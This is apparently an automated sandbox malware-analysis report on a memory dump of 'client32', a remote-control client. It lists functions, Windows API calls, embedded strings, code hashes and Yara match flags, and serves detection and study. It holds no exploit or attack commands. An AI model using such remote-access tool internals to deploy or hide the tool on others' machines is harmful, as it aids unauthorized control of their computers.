                                                                                  • ResponseChk, xrefs: 11135717
                                                                                  • UI.CPP, xrefs: 111357E9
                                                                                  • Client possibly unresponsive for %d ms (tid=%d)Callstack:, xrefs: 111357B6
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: CountObjectSingleTickWait$ExitProcesswsprintf
                                                                                  • String ID: Client possibly unresponsive for %d ms (tid=%d)Callstack:$ResponseChk$UI.CPP
                                                                                  • API String ID: 2020353970-2880927372
                                                                                  APIs
                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,00000000), ref: 110F1655
                                                                                  • GetShortPathNameA.KERNEL32(?,?,00000104), ref: 110F166A
                                                                                    • Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E
                                                                                  • CreateFileA.KERNEL32(?,00000000,00000000,00000000,00000000,04000000,00000000), ref: 110F16C3
                                                                                  • CreateFileA.KERNEL32(?,00000000,00000000,00000000,00000000,04000000,00000000), ref: 110F1708
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: File$CreateName$ModulePathShort_strrchr
                                                                                  • String ID: \\.\$nsmvxd.386$pcdvxd.386
                                                                                  • API String ID: 1318148156-3179819359
                                                                                  APIs
                                                                                  • _memmove.LIBCMT ref: 11081859
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: ErrorExitLastMessageProcess_memmovewsprintf
                                                                                  • String ID: !m_bReadOnly$..\CTL32\DataStream.cpp$IsA()$m_nLength>=nBytes$nBytes>=0$pData
                                                                                  • API String ID: 1528188558-3417006389
APIs
• ExtractIconA.SHELL32(00000000,?,00000000), ref: 1103F76C
• SetDlgItemTextA.USER32(?,00000471,?), ref: 1103F784
• DestroyCursor.USER32(00000000), ref: 1103F7A1
• SetDlgItemTextA.USER32(?,00000471,00000000), ref: 1103F7B4
• UpdateWindow.USER32(00000000), ref: 1103F7F2
  • Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E
Strings
• e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 1103F7DC
• m_hWnd, xrefs: 1103F7E1
Memory Dump Source
• Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_11000000_client32.jbxd
Similarity
• API ID: ItemText$CursorDestroyExtractIconUpdateWindow_strrchr
• String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
• API String ID: 3726914545-2830328467
• Opcode ID: 73bb6436336379db390de3057b4568d21503c8f708411fbe6b6bfc52bf0a24e6
• Instruction ID: 7fabd73ab2c015b19e51bb87ae7bab873905cbda80a3d362d09b7776c5ddc496
• Opcode Fuzzy Hash: 73bb6436336379db390de3057b4568d21503c8f708411fbe6b6bfc52bf0a24e6
• Instruction Fuzzy Hash: 4C21D1B9B40315BFE6219AA1DC86F5BB7A8AFC5B05F104418F79A9B2C0DBB4B4008756
APIs
• GetMenuItemCount.USER32(?), ref: 1115F62F
• _memset.LIBCMT ref: 1115F64B
• GetMenuItemID.USER32(?,00000000), ref: 1115F65C
  • Part of subcall function 111439A0: _memset.LIBCMT ref: 111439C9
  • Part of subcall function 111439A0: GetVersionExA.KERNEL32(?), ref: 111439E2
• CheckMenuItem.USER32(?,00000000,00000000), ref: 1115F698
• EnableMenuItem.USER32(?,00000000,00000000), ref: 1115F6AE
• SetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 1115F6C4
Similarity
• API ID: ItemMenu$_memset$CheckCountEnableInfoVersion
• String ID: 0
• API String ID: 176136580-4108050209
• Opcode ID: 952994a233711950fdab02d23ca0bcaac5a8ee4e392a6680f60084daabe75429
• Instruction ID: be0221c4a5135c336c62c383b80ea9a6d71c1dc3530fa78f313eaeef8d4c2bd6
• Opcode Fuzzy Hash: 952994a233711950fdab02d23ca0bcaac5a8ee4e392a6680f60084daabe75429
• Instruction Fuzzy Hash: C621A17591111AABE741DB74CE84FAFBBACEF46358F104025F961E6160DB74DA00C772
APIs
• _memmove.LIBCMT ref: 1108132F
• _memset.LIBCMT ref: 11081318
  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
Similarity
• API ID: ErrorExitLastMessageProcess_memmove_memsetwsprintf
• String ID: ..\CTL32\DataStream.cpp$IsA()$m_iPos>=nBytes$nBytes>=0$pData
• API String ID: 75970324-4264523126
• Opcode ID: d8c9cfc558a83648f442f3398f9905bd9548d166cd1f75af1a89d4c0a32f60db
• Instruction ID: 3f790bad6e390bc8ea8a8f21c3872a9d67b2f4e4425326796fba8d3d5e2d5bab
• Opcode Fuzzy Hash: d8c9cfc558a83648f442f3398f9905bd9548d166cd1f75af1a89d4c0a32f60db
• Instruction Fuzzy Hash: 6B11EB7DF143126FC605DF41EC43F9AF3D4AF9064CF108039E94A27241E571B808C6A1
APIs
• IsWindow.USER32(00000000), ref: 1103F466
• FindWindowA.USER32(PCIVideoSlave32,00000000), ref: 1103F47C
• IsWindow.USER32(00000000), ref: 1103F484
• Sleep.KERNEL32(00000014), ref: 1103F497
• FindWindowA.USER32(PCIVideoSlave32,00000000), ref: 1103F4A7
• IsWindow.USER32(00000000), ref: 1103F4AF
Similarity
• API ID: Window$Find$Sleep
• String ID: PCIVideoSlave32
• API String ID: 2137649973-2496367574
• Opcode ID: f9403fe9dea3d152aead7fa3d2adf20292fef7f356e696344d66dd2b7210a141
• Instruction ID: 349d86511175fe1d1df632f2bffc72f1f56a45a46628263fa2557b0125cca1c8
• Opcode Fuzzy Hash: f9403fe9dea3d152aead7fa3d2adf20292fef7f356e696344d66dd2b7210a141
• Instruction Fuzzy Hash: 44F0A473A4122A6EDB01EFF98DC4FA6B7D8AB84699F410074E968D7109F634E8014777
APIs
• LoadMenuA.USER32(00000000,00002EFF), ref: 1100340E
• GetSubMenu.USER32(00000000,00000000), ref: 1100343A
• GetSubMenu.USER32(00000000,00000000), ref: 1100345C
• DestroyMenu.USER32(00000000), ref: 1100346A
  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
Similarity
• API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
• String ID: ..\CTL32\annotate.cpp$hMenu$hSub
• API String ID: 468487828-934300333
• Opcode ID: cb09c6b33aa2397f6040dc9ac8fe113c92c7d1ba2ee6536d01521099fc9f1030
• Instruction ID: 1378fb0f7ab2c0978cd4d50cac7dc25882af45c4d25f08e40c7e232078aa5069
• Opcode Fuzzy Hash: cb09c6b33aa2397f6040dc9ac8fe113c92c7d1ba2ee6536d01521099fc9f1030
• Instruction Fuzzy Hash: B3F0E93AE9063573E25252A71C86F9FE2488B45699F500032F926BA580EA14B80043E9
APIs
• LoadMenuA.USER32(00000000,00002EF9), ref: 1100331D
• GetSubMenu.USER32(00000000,00000000), ref: 11003343
• GetMenuItemCount.USER32(00000000), ref: 11003367
• DestroyMenu.USER32(00000000), ref: 11003379
  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
Similarity
• API ID: Menu$CountDestroyErrorExitItemLastLoadMessageProcesswsprintf
• String ID: ..\CTL32\annotate.cpp$hMenu$hSub
• API String ID: 4241058051-934300333
• Opcode ID: 85d4a40678ea7b6d13a0383658e2681328b2af046e894752399e51aa99d6900d
• Instruction ID: a78e3c2f88e64c1b086a81e8c9a2b46f663d882bee818e15e56a3ec0b04889ae
• Opcode Fuzzy Hash: 85d4a40678ea7b6d13a0383658e2681328b2af046e894752399e51aa99d6900d
• Instruction Fuzzy Hash: AEF02E36E9093A73D25212B72C4AFCFF6584F456ADB500031F922B5645EE14A40053A9
APIs
• GetWindowTextA.USER32(?,?,00000050), ref: 11025766
• _strncat.LIBCMT ref: 1102577B
• SetWindowTextA.USER32(?,?), ref: 11025788
  • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
  • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
• GetDlgItemTextA.USER32(?,00001395,?,00000040), ref: 11025814
• GetDlgItemTextA.USER32(?,00001397,?,00000040), ref: 11025828
• SetDlgItemTextA.USER32(?,00001397,?), ref: 11025840
• SetDlgItemTextA.USER32(?,00001395,?), ref: 11025852
• SetFocus.USER32(?), ref: 11025855
  • Part of subcall function 11025260: GetDlgItem.USER32(?,?), ref: 110252B0
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  • API ID: Text$Item$Window$Focus_malloc_memset_strncatwsprintf
                                                                                  • String ID:
                                                                                  • API String ID: 3832070631-0
                                                                                  • Opcode ID: 7bedf844c1c4ce4bd4cf84ee3ec1953557bc0074e6a750ec634dd3c80f65a2ee
                                                                                  • Instruction ID: bfe7d5249f4b6e1d02486e1e3511efca77028c7631b8c8a816f62769cf0b8b3d
                                                                                  • Opcode Fuzzy Hash: 7bedf844c1c4ce4bd4cf84ee3ec1953557bc0074e6a750ec634dd3c80f65a2ee
                                                                                  • Instruction Fuzzy Hash: 5D41A1B1A40349ABE710DB74CC85BBAF7F8FB44714F004969E62A97680EBB4A904CB54
                                                                                  APIs
                                                                                  • GetFileSize.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,111323D6,00000000,?), ref: 110EF7A8
                                                                                  • ReadFile.KERNEL32(00000000,00000000,0000000E,?,00000000,?,111323D6,00000000,?), ref: 110EF7BD
                                                                                  • GlobalAlloc.KERNEL32(00000042,-0000000E,00000000), ref: 110EF7DF
                                                                                  • GlobalLock.KERNEL32(00000000), ref: 110EF7EC
                                                                                  • ReadFile.KERNEL32(00000000,00000000,-0000000E,0000000E,00000000), ref: 110EF7FB
                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 110EF80B
                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 110EF825
                                                                                  • GlobalFree.KERNEL32(00000000), ref: 110EF82C
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  • API ID: Global$File$ReadUnlock$AllocFreeLockSize
                                                                                  • String ID:
                                                                                  • API String ID: 3489003387-0
                                                                                  • Opcode ID: dd8f80031ae181a8ed5eea704e92fea1ffadc77db63c751e718b3c2d07927bee
                                                                                  • Instruction ID: 752bd59a7f8b278135cd4218b820f19d57544efb101fbb4cfc0774b0aabdd1bf
                                                                                  • Opcode Fuzzy Hash: dd8f80031ae181a8ed5eea704e92fea1ffadc77db63c751e718b3c2d07927bee
                                                                                  • Instruction Fuzzy Hash: 3721C532A41019AFD704DFA5CA89AFEB7FCEB4421AF0001AEF91997540DF709901C7E2
                                                                                  APIs
                                                                                    • Part of subcall function 11088C40: IsWindow.USER32(?), ref: 11088C5F
                                                                                    • Part of subcall function 11088C40: IsWindow.USER32(?), ref: 11088C6D
                                                                                  • GetParent.USER32(00000000), ref: 11089996
                                                                                  • GetParent.USER32(00000000), ref: 110899A7
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  • API ID: ParentWindow
                                                                                  • String ID: .chm$.hlp$WinHelp cmd=%d, id=%d, file=%s$debughlp.$$$
                                                                                  • API String ID: 3530579756-3361795001
                                                                                  • Opcode ID: 434b2cb741835ac03b002844321d47e96989c184908e24c31a4124005bd277de
                                                                                  • Instruction ID: dcd0680657676d00064f31b5da51888b306acc0f32f54203c3ee3b251bcfdaac
                                                                                  • Opcode Fuzzy Hash: 434b2cb741835ac03b002844321d47e96989c184908e24c31a4124005bd277de
                                                                                  • Instruction Fuzzy Hash: F5712774E0426AAFDB11DFA4DD81FEFB7E8EF85308F4040A5E909A7241E771A944CB91
                                                                                  APIs
                                                                                    • Part of subcall function 110DEB60: EnterCriticalSection.KERNEL32(111EE0A4,11018BE8,50D94AA1,?,?,?,111CD988,11187878,000000FF,?,1101ABB2), ref: 110DEB61
                                                                                    • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                    • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                    • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                  • std::exception::exception.LIBCMT ref: 1101B776
                                                                                  • __CxxThrowException@8.LIBCMT ref: 1101B791
                                                                                  • LoadLibraryA.KERNEL32(NSSecurity.dll,00000000,111CD988), ref: 1101B7AE
                                                                                    • Part of subcall function 11008DD0: std::_Xinvalid_argument.LIBCPMT ref: 11008DEA
                                                                                  Strings
                                                                                  • NSSecurity.dll, xrefs: 1101B7A3
                                                                                  • NsAppSystem Info : Control Channel Command Sent : %d, xrefs: 1101B70A
                                                                                  • NsAppSystem Info : Control Channel Sending Command : %d, xrefs: 1101B6E9
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  • API ID: CriticalEnterException@8LibraryLoadSectionThrowXinvalid_argument_malloc_memsetstd::_std::exception::exceptionwsprintf
                                                                                  • String ID: NSSecurity.dll$NsAppSystem Info : Control Channel Command Sent : %d$NsAppSystem Info : Control Channel Sending Command : %d
                                                                                  • API String ID: 3515807602-1044166025
                                                                                  • Opcode ID: 7a2bf5ffa17c4bb655a0ec223d7da8cb5fbd7026380f7eb9f48cf61b11f3b8ad
                                                                                  • Instruction ID: 97a0dec6d0d64d3c3877ebf05293913b11e378911f3366e288316342895a3808
                                                                                  • Opcode Fuzzy Hash: 7a2bf5ffa17c4bb655a0ec223d7da8cb5fbd7026380f7eb9f48cf61b11f3b8ad
                                                                                  • Instruction Fuzzy Hash: 72718FB5D00309DFEB10CFA4C844BDDFBB4AF19318F244569E915AB381DB79AA44CB91
                                                                                  APIs
                                                                                  • EnterCriticalSection.KERNEL32(?,50D94AA1,76937CB0,76937AA0,?,76937CB0,76937AA0), ref: 11071824
                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 11071838
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  • LeaveCriticalSection.KERNEL32(00000000,?,?), ref: 110719B1
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  • API ID: CriticalSection$Leave$EnterErrorExitLastMessageProcesswsprintf
                                                                                  • String ID: ..\ctl32\Connect.cpp$Register NC_CHATEX for conn=%s, q=%p$queue$r->queue != queue
                                                                                  • API String ID: 624642848-3840833929
                                                                                  • Opcode ID: 3f5b2276da03322f2c0effce7b3b564e392dbc3a3c940142a110668279eae6c1
                                                                                  • Instruction ID: 4c47afc427fc1e2a273e18b082198136771a32f8cb6ee563f570ada24247464b
                                                                                  • Opcode Fuzzy Hash: 3f5b2276da03322f2c0effce7b3b564e392dbc3a3c940142a110668279eae6c1
                                                                                  • Instruction Fuzzy Hash: 9B611475E04285AFE701CF64C480FAABBF6FB05314F0485A9E8959B2C1E774E985CBA4
                                                                                  APIs
                                                                                    • Part of subcall function 110CEEB0: CreateDialogParamA.USER32(00000000,?,1112E709,110CC170,00000000), ref: 110CEF41
                                                                                    • Part of subcall function 110CEEB0: GetLastError.KERNEL32 ref: 110CF099
                                                                                    • Part of subcall function 110CEEB0: wsprintfA.USER32 ref: 110CF0C8
                                                                                    • Part of subcall function 111439A0: _memset.LIBCMT ref: 111439C9
                                                                                    • Part of subcall function 111439A0: GetVersionExA.KERNEL32(?), ref: 111439E2
                                                                                  • GetWindowLongA.USER32(?,000000EC), ref: 110935E9
                                                                                  • SetWindowLongA.USER32(?,000000EC,00000000), ref: 11093617
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  • GetWindowLongA.USER32(?,000000F0), ref: 11093640
                                                                                  • SetWindowLongA.USER32(?,000000F0,00000000), ref: 1109366E
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: LongWindow$ErrorLastwsprintf$CreateDialogExitMessageParamProcessVersion_memset
                                                                                  • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                  • API String ID: 3136964118-2830328467
                                                                                  • Opcode ID: 990935dc77e2aa569bf3059a9d0286cde9b91335195f1cd60f9fd39a0179e0c2
                                                                                  • Instruction ID: a6255a4dd11f96cfd194679b8cc3cdd2b3575d4c8ce1213ed658c40333833496
                                                                                  • Opcode Fuzzy Hash: 990935dc77e2aa569bf3059a9d0286cde9b91335195f1cd60f9fd39a0179e0c2
                                                                                  • Instruction Fuzzy Hash: 1431E4B5A04615ABCB14DF65DC81F9BB3E5AB8C318F10862DF56A973D0DB34B840CB98
                                                                                  APIs
                                                                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,?), ref: 110ED801
                                                                                  • _free.LIBCMT ref: 110ED81C
                                                                                    • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
                                                                                    • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                                  • _malloc.LIBCMT ref: 110ED82E
                                                                                  • RegQueryValueExA.ADVAPI32(000007FF,?,00000000,?,00000000,000007FF), ref: 110ED85A
                                                                                  • _free.LIBCMT ref: 110ED8E3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: QueryValue_free$ErrorFreeHeapLast_malloc
                                                                                  • String ID: Error %d getting %s
                                                                                  • API String ID: 582965682-2709163689
                                                                                  • Opcode ID: 4b19a493165c69821216a9cf770e163d849a3648b016c58b16d16473fa7c737d
                                                                                  • Instruction ID: 02eced05e3356085969bcbe05084d5abf0c2b7b1903d0388d20c61e7be7eac91
                                                                                  • Opcode Fuzzy Hash: 4b19a493165c69821216a9cf770e163d849a3648b016c58b16d16473fa7c737d
                                                                                  • Instruction Fuzzy Hash: F1318375D001289BDB60DA59CD84BEEB7F9EF54314F0481E9E88DA7240DE706E89CBD1
                                                                                  APIs
                                                                                    • Part of subcall function 111100D0: SetEvent.KERNEL32(00000000,?,1102CB9F), ref: 111100F4
                                                                                    • Part of subcall function 11110920: EnterCriticalSection.KERNEL32(00000010,00000000,762323A0,1100BF7B), ref: 11110928
                                                                                    • Part of subcall function 11110920: LeaveCriticalSection.KERNEL32(00000010), ref: 11110935
                                                                                  • WaitForSingleObject.KERNEL32(?,00001388), ref: 1103D13A
                                                                                  • SetPriorityClass.KERNEL32(?,?), ref: 1103D167
                                                                                  • IsWindow.USER32(?), ref: 1103D17E
                                                                                  • SendMessageA.USER32(?,0000004A,0006040E,00000492), ref: 1103D1B8
                                                                                  • _free.LIBCMT ref: 1103D1BF
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$ClassEnterEventLeaveMessageObjectPrioritySendSingleWaitWindow_free
                                                                                  • String ID: Show16
                                                                                  • API String ID: 625148989-2844191965
                                                                                  • Opcode ID: 3c8172704bdceca68c72fbf0a9a51fac22612fd7412045f5de257e3282e9e7b5
                                                                                  • Instruction ID: 63bdf3f47677d5a3c66ccb25ed14d3d2c42581b640399fe0720dd9fbd5d3b219
                                                                                  • Opcode Fuzzy Hash: 3c8172704bdceca68c72fbf0a9a51fac22612fd7412045f5de257e3282e9e7b5
                                                                                  • Instruction Fuzzy Hash: 3B3182B5E10346AFD715DFA4C8849AFF7F9BB84309F40496DE56A97244DB70BA00CB81
                                                                                  APIs
                                                                                    • Part of subcall function 110D1540: wvsprintfA.USER32(?,?,00000000), ref: 110D1572
                                                                                  • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 110096D6
                                                                                  • WriteFile.KERNEL32(?,<tr><td ><div align="center"><img src="URL_list.gif" height="78"><br></div> </td></tr><tr><td > <div align="left"> <table border="0" cellpadding="0" height="23" >,000000B9,00000000,00000000), ref: 110096EB
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  Strings
                                                                                  • <HTML%s><Body><title>Approved URLs</title><body bgcolor="#FFFFFF"><div align="center"> <center><table > <td><div align="center"> <center><table border="1" cellspacing="0" cellpadding="3" bgcolor="#FFFFFF" bordercolor="#6089B7">, xrefs: 11009659
                                                                                  • e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 11009688, 110096B0
                                                                                  • IsA(), xrefs: 1100968D, 110096B5
                                                                                  • <tr><td ><div align="center"><img src="URL_list.gif" height="78"><br></div> </td></tr><tr><td > <div align="left"> <table border="0" cellpadding="0" height="23" >, xrefs: 110096E5
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FileWrite$ErrorExitLastMessageProcesswsprintfwvsprintf
                                                                                  • String ID: <HTML%s><Body><title>Approved URLs</title><body bgcolor="#FFFFFF"><div align="center"> <center><table > <td><div align="center"> <center><table border="1" cellspacing="0" cellpadding="3" bgcolor="#FFFFFF" bordercolor="#6089B7">$<tr><td ><div align="center"><img src="URL_list.gif" height="78"><br></div> </td></tr><tr><td > <div align="left"> <table border="0" cellpadding="0" height="23" >$IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                  • API String ID: 863766397-389219706
                                                                                  • Opcode ID: 6cba4906e97f348ea097e0d93425011368abffb83af317fd01dd9cb46dfc5e94
                                                                                  • Instruction ID: c29ccd5437a1998bdc0500c50b26c338a4961a37ea6a19b2fc580a4c00e0eec9
                                                                                  • Opcode Fuzzy Hash: 6cba4906e97f348ea097e0d93425011368abffb83af317fd01dd9cb46dfc5e94
                                                                                  • Instruction Fuzzy Hash: 5A215E75A00219ABDB00DFD5DC41FEEF3B8FF59654F10025AE922B7280EB746504CBA1
                                                                                  APIs
                                                                                  • IsWindow.USER32(0000070B), ref: 110ED02A
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  • LoadCursorA.USER32(00000000,00007F00), ref: 110ED0B1
                                                                                  • SetCursor.USER32(00000000), ref: 110ED0B8
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Cursor$ErrorExitLastLoadMessageProcessWindowwsprintf
